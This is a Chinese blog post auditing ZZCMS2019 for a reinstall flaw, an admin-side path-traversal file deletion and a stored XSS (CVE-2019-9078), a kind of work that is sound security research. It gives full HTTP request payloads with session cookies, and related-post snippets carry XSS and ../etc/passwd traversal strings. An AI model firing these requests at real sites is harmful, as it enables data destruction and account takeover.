%3c php if() %3e,代码审计之ZZCMS2019版 XSS

最新推荐文章于 2022-12-10 19:46:18 发布
最新推荐文章于 2022-12-10 19:46:18 发布
阅读量385 收藏
点赞数
文章标签: %3c php if() %3e
本文详细分析了ZZCMS2019版本的安全漏洞,包括重装漏洞、后台任意文件删除及存储型XSS。在step1.php的安装检查、step2.php和step3.php的token生成、 dl_data.php的文件删除以及ask.php的XSS漏洞等方面进行了深入探讨,揭示了系统存在的安全隐患。
摘要由CSDN通过智能技术生成

ZZCMS2019版本代码审计记录

下载

重装漏洞

step1.php中会检测是否存在install.lock,存在则显示已经安装过,否则跳出判断,执行正常安装

ef292aa57f7960df9de22554b75aa8bb.png

但是该判断只在step1.php中存在,step2.php,step3.php,step4.php均不存在该代码

037237b7399ffce2b420240b99403c87.png

step2.php

step3.php中设置了token,计算方式是:使用rand()生成一个随机数,然后以这个随机数作为前缀生成23位的唯一ID,然后再进行md5加密确保唯一性。uniqid(prefix,more_entropy)函数基于以微秒计的当前时间,生成一个唯一的 ID。

如果 prefix参数为空,则返回的字符串有 13 个字符串长。如果 more_entropy参数设置为 true,则是 23 个字符串长。

如果more_entropy 参数设置为 true,则在返回值的末尾添加额外的熵(使用组合线形同余数生成程序),这样可以结果的唯一性更好。

12c048d8c568994c9b1d5b0b20a51fda.png

step3.php

index.php中定义了$step变量获取方法

因此重装漏洞可以通过poststep值进行触发

781481d32153c1208d8fb2bdda36ef65.png

后台任意文件删除

前提:需要后台权限

漏洞位置:/admin/dl_data.php第12行开始

其中$_GET["filename"]直接get方式取得filename,没有经过过滤,导致可跨目录任意删除文件

Payload:GET /admin/dl_data.php?action=del&filename=../robots.txt HTTP/1.1Host: www.zzcms2019.ccProxy-Connection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36DNT: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: PHPSESSID=pfaouuq82dnb11vske0ahqr7f2; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; tablename=zzcms_zsclass

访问后,根目录下的robots.txt已被删除

存储型XSS(CVE-2019-9078)

细读了下源码,发现在/user/ask.php中存在modify()函数,部分代码如下

以get方法获取do参数

modify()函数

其中调用了存在问题的函数markit()

函数所在文件/inc/function.php

其中的$url没有经过过滤,直接插入数据库,因此我们可以注册一个用户,访问 http://www.zzcms2019.cc/user/ask.php?do=modify&page=1&id=1,会出现

408ee84f2ca270eda33058dda667f3b0.png

这时我们可以用Burpsuite抓包,修改包体的URI路径为/user/ask.php?do=modify&page=1&id=1&aaa=

使用是因为在/inc/stopsqlin.php中有一段检测函数

2544e73e567082ced9a818560aa1440f.png

完整包体如下GET /user/ask.php?do=modify&page=1&id=1&aaa= HTTP/1.1

Host: www.zzcms2019.cc

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Cookie: __tins__713776=%7B%22sid%22%3A%201551009070949%2C%20%22vd%22%3A%205%2C%20%22expires%22%3A%201551010962798%7D; __51cke__=; __51laig__=12; bdshare_firstime=1551002231060; PHPSESSID=8o9ms5t57q6dag7ofku75fn2j7; UserName=test; PassWord=e10adc3949ba59abbe56e057f20f883e

Connection: keep-alive

Upgrade-Insecure-Requests: 1

当管理员访问后台中的用户→用户不良操作记录时

1e36a65587d94976dfda20cadf38595a.png

即可触发

2e112d4719b36a993900c444741f6179.png

东坡不改了
关注
zzcms2019存储型xss漏洞审计(超详细)
Cvjark的博客
03-27 1120
存储型xss漏洞复现 function stripfxg($string,$htmlspecialchars_decode=false,$nl2br=false) { $string=stripslashes($string); if ($htmlspecialchars_decode==true){ $string=htmlspecialchars_decode($string);//转html实体符号 } if ($nl2br==true){ $string=nl2br($
zzcms2019重装漏洞审计
Cvjark的博客
03-28 755
审计cms的重装业务逻辑并实现bypass达到系统重装的目的 漏洞点zzcms.com/install/index.php 附加调试器,访问:http://www.zzcms.com/install/index.php?XDEBUG_SESSION_START=16156(XDEBUG_SESSION_START是调试器附加的)访问结果如下图: 根据页面回显信息,keyword是:/install/install.lock文件,回到index.php代码,索引这个字段,发现0 found 试试全局f
zzcms2019.zip
08-22
可用来代码审计,或者网站搭建,或者PHP代码学习网站搭建
zzcms,招商网cms,专业做招商网,zzcms专业做招商网zzcms201910.zip
01-15
ZZCMS 用项目加盟型模板,可快速搭建像 jiameng.com项目加盟网,u88.com,3158.cn,28.com,78.cn 等这种类型的商机网,致富网的程序、源码
ZZCMS审计(XSS)
杨同学的博客
12-10 584
php代码审计
java%3c%3e如何转义_如何让前端更安全?——XSS 攻击和防御详解
weixin_42362491的博客
02-28 1233
最近深入了解了一下XSS攻击。以前总肤浅的认为XSS防御仅仅只是输入过滤可能造成的XSS而已。然而这池子水深的很呐。1,XSS的类型总体来说,XSS分三类,存储型XSS、反射型XSS、DOM-XSS。1.1、存储型XSS数据库中存有的存在XSS攻击的数据,返回给客户端。若数据未经过任何转义。被浏览器渲染。就可能导致XSS攻击;1.2、反射型XSS将用户输入的存在XSS攻击的数据,发送给后台,后台并...
html中%3c%3e括号,encodeURLComponent编码问题
weixin_42389030的博客
06-16 1162
问题所处环境:IIS 7.5, ASP.NET 4.0, 应用程序池(Application Pool)运行于集成模式(Integrated)。我们查了一下,具体的错误信息是:A potentially dangerous Request.QueryString value was detected from the client (t="...9)-解析Table.Attach引发的异常和解决方...
%3cscript%3e中写html,跨站脚本攻击(XSS)的原理、防范和处理方法脚本安全 -电脑资料...
weixin_31411315的博客
06-04 1536
0,1。概念以下概念摘抄自百度百科:XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。2。生效方式1)构造URLXSS攻击者通过构造URL的方式构造了一个有问题的页面;当其他人点击了此页面后,会发现页面出错,或者被暗中执行了某些...
渗透测试:XSS漏洞定义及防护
WEL测试
12-22 937
什么是XSS XSS(cross site script)或者说跨站脚本是一种web应用程序的漏洞,恶意攻击者往web页面里插入恶意script代码,当用户浏览该页之时,嵌入其中web里面的script代码会被执行,从而达到恶意攻击用户的目的。 跨站脚本漏洞风险 盗取用户cookie,然后伪造用户身份登录,泄露用户个人身份及用户订单信息。 操控用户浏览器,借助其他漏洞可能会导致对https加密信息的破解,导致登录传输存在安全风险。 结合浏览器及其插件漏洞,下载病毒木马到浏览器的计算机上执行。 修改页面内容
XSS(跨站脚本攻击) - 常用代码大全
qq_28004653的博客
07-06 1783
1’"()&% <svg/οnlοad=alert(1)> '> =’> %3Cscript%3Ealert(‘XSS’)%3C/script%3E %0a%0a.jsp %22%3cscript%3ealert(%22xss%22)%3c/script%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/wi
zzcms网站管理系统 v1.0.rar
07-06
程序说明 ZZCMS是一个免费的开源的网站管理系统,目前功能主要用于个人网站建设和企业网站建设,欢迎你的加入,请提出你宝贵的意见,在此感谢! 可用于建设企业网站及个人网站建设 采用PHP MYSQL开发 开发环境:php5.0 mysql5.0 特点: 简单易用,灵活的函数调用 MVC模式开发 多级栏目分类 采用著名的FCK编辑器为后台编辑器 目前具有模块:单页、文章、图片、下载、友情连接 程序安装路径:http://你的网站地址/install 后台路径:http://你的网站地址/admin/AdminLogin.php
zzcms网站管理系统 v1.0 sp3.rar
07-06
ZZCMS是一款小巧,高效,人性化的企业建站程序. 目前具有模块:单页、文章、产品、下载、友情连接、留言本、伪原创、记录蜘蛛等功能 采用缓存技术让速度更快 栏目为多级分类 留言可在后台设置是否通过审核的留言 系统自带4000多条同义词,并且可以自由添加修改同义词,还可以在后台设置是否启用伪原创。打造伪原创效果 方面调用功能让不懂程序的人也可以方便建站 介绍: 程序安装路径:http://你的网站地址/install 后台路径:http://你的网站地址/admin/AdminLogin.php 安装完成后请先在后台生成缓存
zzcms83代码审计练习
10-24
提供刚刚学习代码审计的同学一起学习,其实也没有什么好说的,由于市面上比较难找,这里提供给大家方便下载,本是8.3的。
招商网站源码
07-03
招商网站源码
zzcms轻量级企业网站管理系统 v1.0 beta
11-07
本程序是一款轻量级企业网站管理系统,基于PHP+Mysql架构,可运行在Linux、Windows等各种平台上,系统搭载Smarty模板引擎,支持伪静态。后端使用Smarty框架,MVC模式。前端使用响应式HTML5+DIV+CSS框架,兼容IE6等各种本浏览器,可拓展可视化布局功能:1:文章模块、单页面模块、产品模块、订单模块、招聘模块、下载模块、图库模块、友情链接模块、在线留言评论模块、广告模块、站内通告模块、邮件群发模块、会员模块、网站基本设置模块、个人会员中心模块2:无限分类功能3:购物车功能,永久保存订单4:内容分页功能5:分享功能6:用户组权限7:密码MD5加密功能8:自动命名分类、多文件上传功能9:页面浏览权限功能10:首页推荐、频道页推荐功能11:图片轮播功能12:文章、产品、下载、招聘、图库搜索功能13:SEO搜索优化,自定义keywords、description关键字,利于搜索引擎收录14:支持伪静态功能15:支付宝接口,实现在线购物16:采集功能17:数据库备份、导入功能18:自动清除缓存功能19:404页面20:在线物流单号查询21:系统日志功能数据库文件可
PHP代码审计ZZCMS2019之cookie注入
杨同学的博客
11-23 861
PHP代码审计
sql server cast函数_原创干货 | ZZCMS2019从存储型XSS到前台SQL注入
weixin_39738380的博客
11-21 172
前言这套CMS被大手子们审计烂了。。。我这个菜鸡只能抢口剩汤喝喝。。存储型XSS这套CMS搭建完成后是这样的先从功能点入手,注册个账号,看看有什么权限用户中心显示的功能比较少,但是目录已经出来了domain/user/进目录看看文件,其中ask.php这个文件引起了我的注意直接访问看看哦豁?空的?眉头一皱发现没那么简单就从这个文件开始入手首先在48行左右发现了GET传递的do参数...
ZZCMS201910代码审计
ztK63LrD的博客
09-11 3370
现在开始分析zzcms中 产生sql注入的原理以及代码审计的过程。先用seay审计大概过一遍此cms中可能存在的漏洞,然后在admin/ask.php的文件看到这个可能存在漏洞的点,这里的sql语句中$_COOKIE["askbigclassid"]这个参数可控,此时就有一个想法我是不是可以将我所想查询的内容通过构造特殊的sql语句插入到这个变量中,进行自己想查询的东西,这里是不是就完成了一个sql注入攻击。
ZZCMS201910审计入门和SQL注入
网络设备配置-华为
11-09 688
php代码审计
<title>Layer 1</title>需要怎么转换才能成为%3Ctitle%3ELayer 1%3C/title%3E的文件
最新发布
05-19
这是一个 HTML 文件的一部分,需要进行 URL 编码才能成为 %3Ctitle%3ELayer%201%3C/title%3E 的形式。可以使用任何在线 URL 编码工具或者在 Python 中使用 urllib 库中的 ...%3Ctitle%3ELayer%201%3C%2Ftitle%3E ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值